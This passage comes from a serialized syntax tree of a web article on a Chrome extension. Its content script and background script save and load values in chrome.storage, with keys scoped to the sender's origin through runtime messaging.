:128,"props":17454,"children":17455},{"style":312},[17456],{"type":38,"value":5815},{"type":33,"tag":128,"props":17458,"children":17459},{"class":130,"line":1089},[17460,17464,17468,17472,17476,17480,17484,17488],{"type":33,"tag":128,"props":17461,"children":17462},{"style":1576},[17463],{"type":38,"value":15964},{"type":33,"tag":128,"props":17465,"children":17466},{"style":312},[17467],{"type":38,"value":2852},{"type":33,"tag":128,"props":17469,"children":17470},{"style":300},[17471],{"type":38,"value":15973},{"type":33,"tag":128,"props":17473,"children":17474},{"style":306},[17475],{"type":38,"value":16183},{"type":33,"tag":128,"props":17477,"children":17478},{"style":300},[17479],{"type":38,"value":15983},{"type":33,"tag":128,"props":17481,"children":17482},{"style":306},[17483],{"type":38,"value":15920},{"type":33,"tag":128,"props":17485,"children":17486},{"style":312},[17487],{"type":38,"value":2966},{"type":33,"tag":128,"props":17489,"children":17490},{"style":312},[17491],{"type":38,"value":762},{"type":33,"tag":128,"props":17493,"children":17494},{"class":130,"line":1101},[17495,17500,17504,17509,17513,17517,17522,17526,17530,17534,17538,17542,17547,17551],{"type":33,"tag":128,"props":17496,"children":17497},{"style":306},[17498],{"type":38,"value":17499}," input",{"type":33,"tag":128,"props":17501,"children":17502},{"style":312},[17503],{"type":38,"value":215},{"type":33,"tag":128,"props":17505,"children":17506},{"style":135},[17507],{"type":38,"value":17508},"addEventListener",{"type":33,"tag":128,"props":17510,"children":17511},{"style":312},[17512],{"type":38,"value":5566},{"type":33,"tag":128,"props":17514,"children":17515},{"style":676},[17516],{"type":38,"value":6040},{"type":33,"tag":128,"props":17518,"children":17519},{"style":140},[17520],{"type":38,"value":17521},"change",{"type":33,"tag":128,"props":17523,"children":17524},{"style":676},[17525],{"type":38,"value":6040},{"type":33,"tag":128,"props":17527,"children":17528},{"style":312},[17529],{"type":38,"value":5584},{"type":33,"tag":128,"props":17531,"children":17532},{"style":300},[17533],{"type":38,"value":5598},{"type":33,"tag":128,"props":17535,"children":17536},{"style":300},[17537],{"type":38,"value":15428},{"type":33,"tag":128,"props":17539,"children":17540},{"style":312},[17541],{"type":38,"value":2852},{"type":33,"tag":128,"props":17543,"children":17544},{"style":306},[17545],{"type":38,"value":17546},"event",{"type":33,"tag":128,"props":17548,"children":17549},{"style":312},[17550],{"type":38,"value":2966},{"type":33,"tag":128,"props":17552,"children":17553},{"style":312},[17554],{"type":38,"value":762},{"type":33,"tag":128,"props":17556,"children":17557},{"class":130,"line":1114},[17558,17563,17567,17571,17576,17580,17585,17589,17593],{"type":33,"tag":128,"props":17559,"children":17560},{"style":300},[17561],{"type":38,"value":17562}," const",{"type":33,"tag":128,"props":17564,"children":17565},{"style":306},[17566],{"type":38,"value":5027},{"type":33,"tag":128,"props":17568,"children":17569},{"style":312},[17570],{"type":38,"value":5657},{"type":33,"tag":128,"props":17572,"children":17573},{"style":306},[17574],{"type":38,"value":17575}," event",{"type":33,"tag":128,"props":17577,"children":17578},{"style":312},[17579],{"type":38,"value":215},{"type":33,"tag":128,"props":17581,"children":17582},{"style":306},[17583],{"type":38,"value":17584},"target",{"type":33,"tag":128,"props":17586,"children":17587},{"style":312},[17588],{"type":38,"value":215},{"type":33,"tag":128,"props":17590,"children":17591},{"style":306},[17592],{"type":38,"value":12126},{"type":33,"tag":128,"props":17594,"children":17595},{"style":312},[17596],{"type":38,"value":5676},{"type":33,"tag":128,"props":17598,"children":17599},{"class":130,"line":1127},[17600,17604,17608,17612,17616,17620,17624,17628,17632],{"type":33,"tag":128,"props":17601,"children":17602},{"style":300},[17603],{"type":38,"value":17562},{"type":33,"tag":128,"props":17605,"children":17606},{"style":306},[17607],{"type":38,"value":13031},{"type":33,"tag":128,"props":17609,"children":17610},{"style":312},[17611],{"type":38,"value":5657},{"type":33,"tag":128,"props":17613,"children":17614},{"style":306},[17615],{"type":38,"value":17575},{"type":33,"tag":128,"props":17617,"children":17618},{"style":312},[17619],{"type":38,"value":215},{"type":33,"tag":128,"props":17621,"children":17622},{"style":306},[17623],{"type":38,"value":17584},{"type":33,"tag":128,"props":17625,"children":17626},{"style":312},[17627],{"type":38,"value":215},{"type":33,"tag":128,"props":17629,"children":17630},{"style":306},[17631],{"type":38,"value":14160},{"type":33,"tag":128,"props":17633,"children":17634},{"style":312},[17635],{"type":38,"value":5676},{"type":33,"tag":128,"props":17637,"children":17638},{"class":130,"line":1139},[17639,17643,17647,17651,17655,17659,17663,17667,17671,17675,17679],{"type":33,"tag":128,"props":17640,"children":17641},{"style":1576},[17642],{"type":38,"value":13561},{"type":33,"tag":128,"props":17644,"children":17645},{"style":312},[17646],{"type":38,"value":2852},{"type":33,"tag":128,"props":17648,"children":17649},{"style":300},[17650],{"type":38,"value":16424},{"type":33,"tag":128,"props":17652,"children":17653},{"style":306},[17654],{"type":38,"value":14160},{"type":33,"tag":128,"props":17656,"children":17657},{"style":312},[17658],{"type":38,"value":215},{"type":33,"tag":128,"props":17660,"children":17661},{"style":135},[17662],{"type":38,"value":6957},{"type":33,"tag":128,"props":17664,"children":17665},{"style":312},[17666],{"type":38,"value":5566},{"type":33,"tag":128,"props":17668,"children":17669},{"style":676},[17670],{"type":38,"value":669},{"type":33,"tag":128,"props":17672,"children":17673},{"style":140},[17674],{"type":38,"value":17149},{"type":33,"tag":128,"props":17676,"children":17677},{"style":676},[17678],{"type":38,"value":669},{"type":33,"tag":128,"props":17680,"children":17681},{"style":312},[17682],{"type":38,"value":17683},")){\n",{"type":33,"tag":128,"props":17685,"children":17686},{"class":130,"line":1152},[17687],{"type":33,"tag":128,"props":17688,"children":17689},{"style":1576},[17690],{"type":38,"value":17691}," return\n",{"type":33,"tag":128,"props":17693,"children":17694},{"class":130,"line":1165},[17695],{"type":33,"tag":128,"props":17696,"children":17697},{"style":312},[17698],{"type":38,"value":13656},{"type":33,"tag":128,"props":17700,"children":17701},{"class":130,"line":1177},[17702,17707],{"type":33,"tag":128,"props":17703,"children":17704},{"style":1576},[17705],{"type":38,"value":17706}," try",{"type":33,"tag":128,"props":17708,"children":17709},{"style":312},[17710],{"type":38,"value":762},{"type":33,"tag":128,"props":17712,"children":17713},{"class":130,"line":1189},[17714,17719,17723,17727,17731,17735,17739],{"type":33,"tag":128,"props":17715,"children":17716},{"style":1576},[17717],{"type":38,"value":17718}," await",{"type":33,"tag":128,"props":17720,"children":17721},{"style":135},[17722],{"type":38,"value":13013},{"type":33,"tag":128,"props":17724,"children":17725},{"style":312},[17726],{"type":38,"value":5836},{"type":33,"tag":128,"props":17728,"children":17729},{"style":306},[17730],{"type":38,"value":5027},{"type":33,"tag":128,"props":17732,"children":17733},{"style":312},[17734],{"type":38,"value":5584},{"type":33,"tag":128,"props":17736,"children":17737},{"style":306},[17738],{"type":38,"value":13031},{"type":33,"tag":128,"props":17740,"children":17741},{"style":312},[17742],{"type":38,"value":5863},{"type":33,"tag":128,"props":17744,"children":17745},{"class":130,"line":1202},[17746,17750,17754,17758,17762,17766,17771,17775],{"type":33,"tag":128,"props":17747,"children":17748},{"style":306},[17749],{"type":38,"value":16105},{"type":33,"tag":128,"props":17751,"children":17752},{"style":312},[17753],{"type":38,"value":215},{"type":33,"tag":128,"props":17755,"children":17756},{"style":135},[17757],{"type":38,"value":13157},{"type":33,"tag":128,"props":17759,"children":17760},{"style":312},[17761],{"type":38,"value":5566},{"type":33,"tag":128,"props":17763,"children":17764},{"style":676},[17765],{"type":38,"value":6040},{"type":33,"tag":128,"props":17767,"children":17768},{"style":140},[17769],{"type":38,"value":17770},"Data saved",{"type":33,"tag":128,"props":17772,"children":17773},{"style":676},[17774],{"type":38,"value":6040},{"type":33,"tag":128,"props":17776,"children":17777},{"style":312},[17778],{"type":38,"value":5815},{"type":33,"tag":128,"props":17780,"children":17781},{"class":130,"line":1214},[17782,17787,17791,17795,17799,17803],{"type":33,"tag":128,"props":17783,"children":17784},{"style":312},[17785],{"type":38,"value":17786}," }",{"type":33,"tag":128,"props":17788,"children":17789},{"style":1576},[17790],{"type":38,"value":6855},{"type":33,"tag":128,"props":17792,"children":17793},{"style":312},[17794],{"type":38,"value":2852},{"type":33,"tag":128,"props":17796,"children":17797},{"style":306},[17798],{"type":38,"value":6889},{"type":33,"tag":128,"props":17800,"children":17801},{"style":312},[17802],{"type":38,"value":2966},{"type":33,"tag":128,"props":17804,"children":17805},{"style":312},[17806],{"type":38,"value":762},{"type":33,"tag":128,"props":17808,"children":17809},{"class":130,"line":1226},[17810,17814,17818,17822,17826,17830,17835,17839,17843,17847],{"type":33,"tag":128,"props":17811,"children":17812},{"style":306},[17813],{"type":38,"value":16105},{"type":33,"tag":128,"props":17815,"children":17816},{"style":312},[17817],{"type":38,"value":215},{"type":33,"tag":128,"props":17819,"children":17820},{"style":135},[17821],{"type":38,"value":13157},{"type":33,"tag":128,"props":17823,"children":17824},{"style":312},[17825],{"type":38,"value":5566},{"type":33,"tag":128,"props":17827,"children":17828},{"style":676},[17829],{"type":38,"value":6040},{"type":33,"tag":128,"props":17831,"children":17832},{"style":140},[17833],{"type":38,"value":17834},"Error saving data",{"type":33,"tag":128,"props":17836,"children":17837},{"style":676},[17838],{"type":38,"value":6040},{"type":33,"tag":128,"props":17840,"children":17841},{"style":312},[17842],{"type":38,"value":5584},{"type":33,"tag":128,"props":17844,"children":17845},{"style":306},[17846],{"type":38,"value":14251},{"type":33,"tag":128,"props":17848,"children":17849},{"style":312},[17850],{"type":38,"value":5815},{"type":33,"tag":128,"props":17852,"children":17853},{"class":130,"line":1239},[17854],{"type":33,"tag":128,"props":17855,"children":17856},{"style":312},[17857],{"type":38,"value":13656},{"type":33,"tag":128,"props":17859,"children":17860},{"class":130,"line":1251},[17861],{"type":33,"tag":128,"props":17862,"children":17863},{"style":312},[17864],{"type":38,"value":13745},{"type":33,"tag":128,"props":17866,"children":17867},{"class":130,"line":1263},[17868],{"type":33,"tag":128,"props":17869,"children":17870},{"style":312},[17871],{"type":38,"value":845},{"type":33,"tag":128,"props":17873,"children":17874},{"class":130,"line":1276},[17875],{"type":33,"tag":128,"props":17876,"children":17877},{"style":312},[17878],{"type":38,"value":854},{"type":33,"tag":81,"props":17880,"children":17881},{"id":12449},[17882],{"type":38,"value":17883},"Background:",{"type":33,"tag":47,"props":17885,"children":17886},{},[17887],{"type":38,"value":17888},"The background script will listen for two events:",{"type":33,"tag":47,"props":17890,"children":17891},{},[17892,17897,17898,17903],{"type":33,"tag":105,"props":17893,"children":17895},{"className":17894},[],[17896],{"type":38,"value":14091},{"type":38,"value":6345},{"type":33,"tag":105,"props":17899,"children":17901},{"className":17900},[],[17902],{"type":38,"value":14303},{"type":38,"value":17904},". These events are processed in order to update or retrieve elements from the chrome storage. It is important to note that the Chrome storage will be scoped to the origin; in other words, each key and value stored or retrieved in the Chrome storage will be scoped to an origin.",{"type":33,"tag":114,"props":17906,"children":17907},{"lang":5526},[17908],{"type":33,"tag":119,"props":17909,"children":17911},{"className":5530,"code":17910,"language":5526,"meta":8,"style":8},"function save(key, value, origin) {\n return new Promise((resolve, reject) => {\n key = key + \"-\" + origin;\n console.log(\"Saving: \", key, value);\n chrome.storage.local.set({ [key]: value }, () => {\n resolve({ message: 'Data saved successfully' })\n })\n })\n}\nfunction load(key, origin) {\n return new Promise((resolve, reject) => {\n key = key + \"-\" + origin;\n console.log(\"Loading: \", key);\n chrome.storage.local.get([key], data => {\n if (data.hasOwnProperty(key) === false) {\n return reject({ message: 'Data not found' });\n }\n console.log(\"Data: \", data[key]);\n resolve(data[key]);\n });\n });\n}\n\nchrome.runtime.onMessage.addListener((request, sender, sendResponse) => {\n new Promise(async () => {\n const sender_origin = new URL(sender.tab.pendingUrl ?? sender.tab.url).origin;\n console.log(\"Sender Origin: \", sender_origin);\n console.log(\"Request: \", request);\n if (request.type === \"SAVE\") {\n save(request.payload.key, request.payload.value, sender_origin)\n .then(response => sendResponse(response))\n .catch(error => sendResponse({ error }));\n } else if (request.type === \"LOAD\") {\n load(request.payload.key, sender_origin)\n .then(response => sendResponse(response))\n .catch(error => sendResponse({ error }));\n }\n })\n return true;\n});\n",[17912],{"type":33,"tag":105,"props":17913,"children":17914},{"__ignoreMap":8},[17915,17958,18001,18044,18095,18162,18197,18204,18211,18218,18253,18296,18339,18382,18437,18488,18527,18534,18585,18612,18619,18626,18633,18640,18707,18738,18821,18864,18907,18954,19021,19060,19099,19154,19197,19236,19275,19282,19289,19304],{"type":33,"tag":128,"props":17916,"children":17917},{"class":130,"line":131},[17918,17922,17926,17930,17934,17938,17942,17946,17950,17954],{"type":33,"tag":128,"props":17919,"children":17920},{"style":300},[17921],{"type":38,"value":13008},{"type":33,"tag":128,"props":17923,"children":17924},{"style":135},[17925],{"type":38,"value":13013},{"type":33,"tag":128,"props":17927,"children":17928},{"style":312},[17929],{"type":38,"value":5566},{"type":33,"tag":128,"props":17931,"children":17932},{"style":306},[17933],{"type":38,"value":13022},{"type":33,"tag":128,"props":17935,"children":17936},{"style":312},[17937],{"type":38,"value":5584},{"type":33,"tag":128,"props":17939,"children":17940},{"style":306},[17941],{"type":38,"value":13031},{"type":33,"tag":128,"props":17943,"children":17944},{"style":312},[17945],{"type":38,"value":5584},{"type":33,"tag":128,"props":17947,"children":17948},{"style":306},[17949],{"type":38,"value":13040},{"type":33,"tag":128,"props":17951,"children":17952},{"style":312},[17953],{"type":38,"value":2966},{"type":33,"tag":128,"props":17955,"children":17956},{"style":312},[17957],{"type":38,"value":762},{"type":33,"tag":128,"props":17959,"children":17960},{"class":130,"line":362},[17961,17965,17969,17973,17977,17981,17985,17989,17993,17997],{"type":33,"tag":128,"props":17962,"children":17963},{"style":1576},[17964],{"type":38,"value":13056},{"type":33,"tag":128,"props":17966,"children":17967},{"style":300},[17968],{"type":38,"value":13061},{"type":33,"tag":128,"props":17970,"children":17971},{"style":437},[17972],{"type":38,"value":13066},{"type":33,"tag":128,"props":17974,"children":17975},{"style":312},[17976],{"type":38,"value":13071},{"type":33,"tag":128,"props":17978,"children":17979},{"style":306},[17980],{"type":38,"value":13076},{"type":33,"tag":128,"props":17982,"children":17983},{"style":312},[17984],{"type":38,"value":5584},{"type":33,"tag":128,"props":17986,"children":17987},{"style":306},[17988],{"type":38,"value":13085},{"type":33,"tag":128,"props":17990,"children":17991},{"style":312},[17992],{"type":38,"value":2966},{"type":33,"tag":128,"props":17994,"children":17995},{"style":312},[17996],{"type":38,"value":5625},{"type":33,"tag":128,"props":17998,"children":17999},{"style":312},[18000],{"type":38,"value":762},{"type":33,"tag":128,"props":18002,"children":18003},{"class":130,"line":403},[18004,18008,18012,18016,18020,18024,18028,18032,18036,18040],{"type":33,"tag":128,"props":18005,"children":18006},{"style":306},[18007],{"type":38,"value":13105},{"type":33,"tag":128,"props":18009,"children":18010},{"style":312},[18011],{"type":38,"value":5657},{"type":33,"tag":128,"props":18013,"children":18014},{"style":306},[18015],{"type":38,"value":5027},{"type":33,"tag":128,"props":18017,"children":18018},{"style":300},[18019],{"type":38,"value":8297},{"type":33,"tag":128,"props":18021,"children":18022},{"style":676},[18023],{"type":38,"value":679},{"type":33,"tag":128,"props":18025,"children":18026},{"style":140},[18027],{"type":38,"value":907},{"type":33,"tag":128,"props":18029,"children":18030},{"style":676},[18031],{"type":38,"value":669},{"type":33,"tag":128,"props":18033,"children":18034},{"style":300},[18035],{"type":38,"value":8297},{"type":33,"tag":128,"props":18037,"children":18038},{"style":306},[18039],{"type":38,"value":13040},{"type":33,"tag":128,"props":18041,"children":18042},{"style":312},[18043],{"type":38,"value":5676},{"type":33,"tag":128,"props":18045,"children":18046},{"class":130,"line":739},[18047,18051,18055,18059,18063,18067,18071,18075,18079,18083,18087,18091],{"type":33,"tag":128,"props":18048,"children":18049},{"style":306},[18050],{"type":38,"value":6880},{"type":33,"tag":128,"props":18052,"children":18053},{"style":312},[18054],{"type":38,"value":215},{"type":33,"tag":128,"props":18056,"children":18057},{"style":135},[18058],{"type":38,"value":13157},{"type":33,"tag":128,"props":18060,"children":18061},{"style":312},[18062],{"type":38,"value":5566},{"type":33,"tag":128,"props":18064,"children":18065},{"style":676},[18066],{"type":38,"value":669},{"type":33,"tag":128,"props":18068,"children":18069},{"style":140},[18070],{"type":38,"value":13170},{"type":33,"tag":128,"props":18072,"children":18073},{"style":676},[18074],{"type":38,"value":669},{"type":33,"tag":128,"props":18076,"children":18077},{"style":312},[18078],{"type":38,"value":5584},{"type":33,"tag":128,"props":18080,"children":18081},{"style":306},[18082],{"type":38,"value":5027},{"type":33,"tag":128,"props":18084,"children":18085},{"style":312},[18086],{"type":38,"value":5584},{"type":33,"tag":128,"props":18088,"children":18089},{"style":306},[18090],{"type":38,"value":13031},{"type":33,"tag":128,"props":18092,"children":18093},{"style":312},[18094],{"type":38,"value":5815},{"type":33,"tag":128,"props":18096,"children":18097},{"class":130,"line":765},[18098,18102,18106,18110,18114,18118,18122,18126,18130,18134,18138,18142,18146,18150,18154,18158],{"type":33,"tag":128,"props":18099,"children":18100},{"style":306},[18101],{"type":38,"value":13202},{"type":33,"tag":128,"props":18103,"children":18104},{"style":312},[18105],{"type":38,"value":215},{"type":33,"tag":128,"props":18107,"children":18108},{"style":306},[18109],{"type":38,"value":12636},{"type":33,"tag":128,"props":18111,"children":18112},{"style":312},[18113],{"type":38,"value":215},{"type":33,"tag":128,"props":18115,"children":18116},{"style":306},[18117],{"type":38,"value":13219},{"type":33,"tag":128,"props":18119,"children":18120},{"style":312},[18121],{"type":38,"value":215},{"type":33,"tag":128,"props":18123,"children":18124},{"style":135},[18125],{"type":38,"value":13228},{"type":33,"tag":128,"props":18127,"children":18128},{"style":312},[18129],{"type":38,"value":5836},{"type":33,"tag":128,"props":18131,"children":18132},{"style":312},[18133],{"type":38,"value":718},{"type":33,"tag":128,"props":18135,"children":18136},{"style":306},[18137],{"type":38,"value":13022},{"type":33,"tag":128,"props":18139,"children":18140},{"style":312},[18141],{"type":38,"value":13245},{"type":33,"tag":128,"props":18143,"children":18144},{"style":306},[18145],{"type":38,"value":13031},{"type":33,"tag":128,"props":18147,"children":18148},{"style":312},[18149],{"type":38,"value":13254},{"type":33,"tag":128,"props":18151,"children":18152},{"style":312},[18153],{"type":38,"value":13259},{"type":33,"tag":128,"props":18155,"children":18156},{"style":312},[18157],{"type":38,"value":5625},{"type":33,"tag":128,"props":18159,"children":18160},{"style":312},[18161],{"type":38,"value":762},{"type":33,"tag":128,"props":18163,"children":18164},{"class":130,"line":804},[18165,18169,18173,18177,18181,18185,18189,18193],{"type":33,"tag":128,"props":18166,"children":18167},{"style":135},[18168],{"type":38,"value":13275},{"type":33,"tag":128,"props":18170,"children":18171},{"style":312},[18172],{"type":38,"value":5836},{"type":33,"tag":128,"props":18174,"children":18175},{"style":437},[18176],{"type":38,"value":6730},{"type":33,"tag":128,"props":18178,"children":18179},{"style":312},[18180],{"type":38,"value":284},{"type":33,"tag":128,"props":18182,"children":18183},{"style":676},[18184],{"type":38,"value":6739},{"type":33,"tag":128,"props":18186,"children":18187},{"style":140},[18188],{"type":38,"value":13296},{"type":33,"tag":128,"props":18190,"children":18191},{"style":676},[18192],{"type":38,"value":6040},{"type":33,"tag":128,"props":18194,"children":18195},{"style":312},[18196],{"type":38,"value":13305},{"type":33,"tag":128,"props":18198,"children":18199},{"class":130,"line":839},[18200],{"type":33,"tag":128,"props":18201,"children":18202},{"style":312},[18203],{"type":38,"value":13313},{"type":33,"tag":128,"props":18205,"children":18206},{"class":130,"line":848},[18207],{"type":33,"tag":128,"props":18208,"children":18209},{"style":312},[18210],{"type":38,"value":13321},{"type":33,"tag":128,"props":18212,"children":18213},{"class":130,"line":976},[18214],{"type":33,"tag":128,"props":18215,"children":18216},{"style":312},[18217],{"type":38,"value":854},{"type":33,"tag":128,"props":18219,"children":18220},{"class":130,"line":988},[18221,18225,18229,18233,18237,18241,18245,18249],{"type":33,"tag":128,"props":18222,"children":18223},{"style":300},[18224],{"type":38,"value":13008},{"type":33,"tag":128,"props":18226,"children":18227},{"style":135},[18228],{"type":38,"value":13340},{"type":33,"tag":128,"props":18230,"children":18231},{"style":312},[18232],{"type":38,"value":5566},{"type":33,"tag":128,"props":18234,"children":18235},{"style":306},[18236],{"type":38,"value":13022},{"type":33,"tag":128,"props":18238,"children":18239},{"style":312},[18240],{"type":38,"value":5584},{"type":33,"tag":128,"props":18242,"children":18243},{"style":306},[18244],{"type":38,"value":13040},{"type":33,"tag":128,"props":18246,"children":18247},{"style":312},[18248],{"type":38,"value":2966},{"type":33,"tag":128,"props":18250,"children":18251},{"style":312},[18252],{"type":38,"value":762},{"type":33,"tag":128,"props":18254,"children":18255},{"class":130,"line":1001},[18256,18260,18264,18268,18272,18276,18280,18284,18288,18292],{"type":33,"tag":128,"props":18257,"children":18258},{"style":1576},[18259],{"type":38,"value":13056},{"type":33,"tag":128,"props":18261,"children":18262},{"style":300},[18263],{"type":38,"value":13061},{"type":33,"tag":128,"props":18265,"children":18266},{"style":437},[18267],{"type":38,"value":13066},{"type":33,"tag":128,"props":18269,"children":18270},{"style":312},[18271],{"type":38,"value":13071},{"type":33,"tag":128,"props":18273,"children":18274},{"style":306},[18275],{"type":38,"value":13076},{"type":33,"tag":128,"props":18277,"children":18278},{"style":312},[18279],{"type":38,"value":5584},{"type":33,"tag":128,"props":18281,"children":18282},{"style":306},[18283],{"type":38,"value":13085},{"type":33,"tag":128,"props":18285,"children":18286},{"style":312},[18287],{"type":38,"value":2966},{"type":33,"tag":128,"props":18289,"children":18290},{"style":312},[18291],{"type":38,"value":5625},{"type":33,"tag":128,"props":18293,"children":18294},{"style":312},[18295],{"type":38,"value":762},{"type":33,"tag":128,"props":18297,"children":18298},{"class":130,"line":1014},[18299,18303,18307,18311,18315,18319,18323,18327,18331,18335],{"type":33,"tag":128,"props":18300,"children":18301},{"style":306},[18302],{"type":38,"value":13105},{"type":33,"tag":128,"props":18304,"children":18305},{"style":312},[18306],{"type":38,"value":5657},{"type":33,"tag":128,"props":18308,"children":18309},{"style":306},[18310],{"type":38,"value":5027},{"type":33,"tag":128,"props":18312,"children":18313},{"style":300},[18314],{"type":38,"value":8297},{"type":33,"tag":128,"props":18316,"children":18317},{"style":676},[18318],{"type":38,"value":679},{"type":33,"tag":128,"props":18320,"children":18321},{"style":140},[18322],{"type":38,"value":907},{"type":33,"tag":128,"props":18324,"children":18325},{"style":676},[18326],{"type":38,"value":669},{"type":33,"tag":128,"props":18328,"children":18329},{"style":300},[18330],{"type":38,"value":8297},{"type":33,"tag":128,"props":18332,"children":18333},{"style":306},[18334],{"type":38,"value":13040},{"type":33,"tag":128,"props":18336,"children":18337},{"style":312},[18338],{"type":38,"value":5676},{"type":33,"tag":128,"props":18340,"children":18341},{"class":130,"line":1026},[18342,18346,18350,18354,18358,18362,18366,18370,18374,18378],{"type":33,"tag":128,"props":18343,"children":18344},{"style":306},[18345],{"type":38,"value":6880},{"type":33,"tag":128,"props":18347,"children":18348},{"style":312},[18349],{"type":38,"value":215},{"type":33,"tag":128,"props":18351,"children":18352},{"style":135},[18353],{"type":38,"value":13157},{"type":33,"tag":128,"props":18355,"children":18356},{"style":312},[18357],{"type":38,"value":5566},{"type":33,"tag":128,"props":18359,"children":18360},{"style":676},[18361],{"type":38,"value":669},{"type":33,"tag":128,"props":18363,"children":18364},{"style":140},[18365],{"type":38,"value":13478},{"type":33,"tag":128,"props":18367,"children":18368},{"style":676},[18369],{"type":38,"value":669},{"type":33,"tag":128,"props":18371,"children":18372},{"style":312},[18373],{"type":38,"value":5584},{"type":33,"tag":128,"props":18375,"children":18376},{"style":306},[18377],{"type":38,"value":5027},{"type":33,"tag":128,"props":18379,"children":18380},{"style":312},[18381],{"type":38,"value":5815},{"type":33,"tag":128,"props":18383,"children":18384},{"class":130,"line":1038},[18385,18389,18393,18397,18401,18405,18409,18413,18417,18421,18425,18429,18433],{"type":33,"tag":128,"props":18386,"children":18387},{"style":306},[18388],{"type":38,"value":13202},{"type":33,"tag":128,"props":18390,"children":18391},{"style":312},[18392],{"type":38,"value":215},{"type":33,"tag":128,"props":18394,"children":18395},{"style":306},[18396],{"type":38,"value":12636},{"type":33,"tag":128,"props":18398,"children":18399},{"style":312},[18400],{"type":38,"value":215},{"type":33,"tag":128,"props":18402,"children":18403},{"style":306},[18404],{"type":38,"value":13219},{"type":33,"tag":128,"props":18406,"children":18407},{"style":312},[18408],{"type":38,"value":215},{"type":33,"tag":128,"props":18410,"children":18411},{"style":135},[18412],{"type":38,"value":13526},{"type":33,"tag":128,"props":18414,"children":18415},{"style":312},[18416],{"type":38,"value":13531},{"type":33,"tag":128,"props":18418,"children":18419},{"style":306},[18420],{"type":38,"value":13022},{"type":33,"tag":128,"props":18422,"children":18423},{"style":312},[18424],{"type":38,"value":13540},{"type":33,"tag":128,"props":18426,"children":18427},{"style":306},[18428],{"type":38,"value":13545},{"type":33,"tag":128,"props":18430,"children":18431},{"style":312},[18432],{"type":38,"value":5625},{"type":33,"tag":128,"props":18434,"children":18435},{"style":312},[18436],{"type":38,"value":762},{"type":33,"tag":128,"props":18438,"children":18439},{"class":130,"line":1051},[18440,18444,18448,18452,18456,18460,18464,18468,18472,18476,18480,18484],{"type":33,"tag":128,"props":18441,"children":18442},{"style":1576},[18443],{"type":38,"value":13561},{"type":33,"tag":128,"props":18445,"children":18446},{"style":312},[18447],{"type":38,"value":2852},{"type":33,"tag":128,"props":18449,"children":18450},{"style":306},[18451],{"type":38,"value":2815},{"type":33,"tag":128,"props":18453,"children":18454},{"style":312},[18455],{"type":38,"value":215},{"type":33,"tag":128,"props":18457,"children":18458},{"style":135},[18459],{"type":38,"value":13578},{"type":33,"tag":128,"props":18461,"children":18462},{"style":312},[18463],{"type":38,"value":5566},{"type":33,"tag":128,"props":18465,"children":18466},{"style":306},[18467],{"type":38,"value":13022},{"type":33,"tag":128,"props":18469,"children":18470},{"style":312},[18471],{"type":38,"value":2966},{"type":33,"tag":128,"props":18473,"children":18474},{"style":300},[18475],{"type":38,"value":13595},{"type":33,"tag":128,"props":18477,"children":18478},{"style":1576},[18479],{"type":38,"value":6721},{"type":33,"tag":128,"props":18481,"children":18482},{"style":312},[18483],{"type":38,"value":2966},{"type":33,"tag":128,"props":18485,"children":18486},{"style":312},[18487],{"type":38,"value":762},{"type":33,"tag":128,"props":18489,"children":18490},{"class":130,"line":1063},[18491,18495,18499,18503,18507,18511,18515,18519,18523],{"type":33,"tag":128,"props":18492,"children":18493},{"style":1576},[18494],{"type":38,"value":13615},{"type":33,"tag":128,"props":18496,"children":18497},{"style":135},[18498],{"type":38,"value":13085},{"type":33,"tag":128,"props":18500,"children":18501},{"style":312},[18502],{"type":38,"value":5836},{"type":33,"tag":128,"props":18504,"children":18505},{"style":437},[18506],{"type":38,"value":6730},{"type":33,"tag":128,"props":18508,"children":18509},{"style":312},[18510],{"type":38,"value":284},{"type":33,"tag":128,"props":18512,"children":18513},{"style":676},[18514],{"type":38,"value":6739},{"type":33,"tag":128,"props":18516,"children":18517},{"style":140},[18518],{"type":38,"value":13640},{"type":33,"tag":128,"props":18520,"children":18521},{"style":676},[18522],{"type":38,"value":6040},{"type":33,"tag":128,"props":18524,"children":18525},{"style":312},[18526],{"type":38,"value":5863},{"type":33,"tag":128,"props":18528,"children":18529},{"class":130,"line":1076},[18530],{"type":33,"tag":128,"props":18531,"children":18532},{"style":312},[18533],{"type":38,"value":13656},{"type":33,"tag":128,"props":18535,"children":18536},{"class":130,"line":1089},[18537,18541,18545,18549,18553,18557,18561,18565,18569,18573,18577,18581],{"type":33,"tag":128,"props":18538,"children":18539},{"style":306},[18540],{"type":38,"value":13664},{"type":33,"tag":128,"props":18542,"children":18543},{"style":312},[18544],{"type":38,"value":215},{"type":33,"tag":128,"props":18546,"children":18547},{"style":135},[18548],{"type":38,"value":13157},{"type":33,"tag":128,"props":18550,"children":18551},{"style":312},[18552],{"type":38,"value":5566},{"type":33,"tag":128,"props":18554,"children":18555},{"style":676},[18556],{"type":38,"value":669},{"type":33,"tag":128,"props":18558,"children":18559},{"style":140},[18560],{"type":38,"value":13685},{"type":33,"tag":128,"props":18562,"children":18563},{"style":676},[18564],{"type":38,"value":669},{"type":33,"tag":128,"props":18566,"children":18567},{"style":312},[18568],{"type":38,"value":5584},{"type":33,"tag":128,"props":18570,"children":18571},{"style":306},[18572],{"type":38,"value":13545},{"type":33,"tag":128,"props":18574,"children":18575},{"style":312},[18576],{"type":38,"value":344},{"type":33,"tag":128,"props":18578,"children":18579},{"style":306},[18580],{"type":38,"value":13022},{"type":33,"tag":128,"props":18582,"children":18583},{"style":312},[18584],{"type":38,"value":13710},{"type":33,"tag":128,"props":18586,"children":18587},{"class":130,"line":1101},[18588,18592,18596,18600,18604,18608],{"type":33,"tag":128,"props":18589,"children":18590},{"style":135},[18591],{"type":38,"value":13275},{"type":33,"tag":128,"props":18593,"children":18594},{"style":312},[18595],{"type":38,"value":5566},{"type":33,"tag":128,"props":18597,"children":18598},{"style":306},[18599],{"type":38,"value":2815},{"type":33,"tag":128,"props":18601,"children":18602},{"style":312},[18603],{"type":38,"value":344},{"type":33,"tag":128,"props":18605,"children":18606},{"style":306},[18607],{"type":38,"value":13022},{"type":33,"tag":128,"props":18609,"children":18610},{"style":312},[18611],{"type":38,"value":13710},{"type":33,"tag":128,"props":18613,"children":18614},{"class":130,"line":1114},[18615],{"type":33,"tag":128,"props":18616,"children":18617},{"style":312},[18618],{"type":38,"value":13745},{"type":33,"tag":128,"props":18620,"children":18621},{"class":130,"line":1127},[18622],{"type":33,"tag":128,"props":18623,"children":18624},{"style":312},[18625],{"type":38,"value":13753},{"type":33,"tag":128,"props":18627,"children":18628},{"class":130,"line":1139},[18629],{"type":33,"tag":128,"props":18630,"children":18631},{"style":312},[18632],{"type":38,"value":854